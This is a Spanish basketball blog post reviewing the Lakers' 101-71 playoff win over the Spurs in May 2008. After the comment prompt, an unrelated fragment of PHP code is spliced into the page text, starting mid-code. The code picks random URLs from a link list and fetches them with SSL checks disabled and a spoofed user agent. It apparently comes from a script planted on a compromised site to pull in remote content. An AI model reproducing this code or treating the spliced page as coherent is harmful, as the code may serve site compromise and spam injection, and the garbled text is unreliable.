Torrija tejana (SAS 71 – LAL 101)

25 de May de 2008 por TheDeerHunter

Entrenamiento con comparsa en el Staples. No hubo partido en ningún momento y el último cuarto fue para la basura. Los Spurs hicieron un juego patético desde el primer minuto por lo que los Lakers ni siquiera tuvieron que emplearse a fondo para ganarles y, a pesar de lo que indica el resultado, no hicieron especialmente un gran partido.

Kobe hizo lo que le dió la gana, pero minimizando al máximo sus aportaciones. Era como que no quería mostrarle a Bowen su repertorio y trató de pasar desapercibido durante el máximo tiempo posible. Eso sí, puntualmente no podía evitar el placer de volverlo loco con alguna de sus jugadas. Seguramente el de Spurs le está preparando una deliciosa receta a Kobe para los partidos del Álamo. Su ya legendaria ensalada de toñinas.

Gasol estuvo flojo y poco participativo y como mucho se mostró pesadete con Duncan, tampoco importaba demasiado porque tras su primer malo, Fisher y Odom reaccionaron y de qué manera, sobre todo este último que fue el mejor de su equipo e hizo añicos la, anoche, delicada defensa de los tejanos. Tras ellos, la segunda oleada estuvo espectacular. Farmar, Walton y Vujacic se pusieron de acuerdo, por primera vez, para demostrar el porqué se decía de L.A. que tenían la plantilla más compensada de la competición. Y para colmo, volvió Ariza unos minutos por fin. Podría ser importantísimo para el sistema defensivo amarillo y para hacer espabilar de una vez por todas al bueno de Radmanovic. Competencia directa en el mismo puesto.

Los locales se limitaron a hacer puntuales ayudas contra Duncan y Parker que los tejanos no tuvieron nunca la frescura mental suficiente para sortear. El resto fueron errores contínuos en el ataque del equipo visitante (sobre todo el pobre Manudo, que está como la chata) y darle velocidad al choque, en ocasiones incluso corriendo como pollos sin cabeza. Las piernas de los de Popovic tampoco pudieron responder. Parece que, conforme van pasando las eliminatorias, Lakers va a mejor y el resto a peor.

En cualquier caso, tampoco vamos a cometer el error de sacar conclusiones extraordinarias del partido de anoche. Tuvieron un mal día y poco más. Como mucho se podrían sacar las mismas que en el segundo partido en Nueva Orleans. Todos sabemos cómo acabó todo. Si algo verdaderamente grande podemos destacar de San Antonio es su capacidad de resistencia. Nadie puede dar por muertos a estos campeones antes de que lo estén, ni con un 2-0 ni con un 3-0. Sabemos de lo que son capaces, no están ni mucho menos hundidos y esto no ha hecho nada más que empezar.

Como dijo Phil Jackson anoche: “Lo sabemos. No habremos hecho nada hasta ganarles en su propia cancha y cualquiera de los dos es capaz de ganar fuera de casa”. A éste se las van a dar con queso estas alturas. Esa es la mentalidad del GANADOR.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>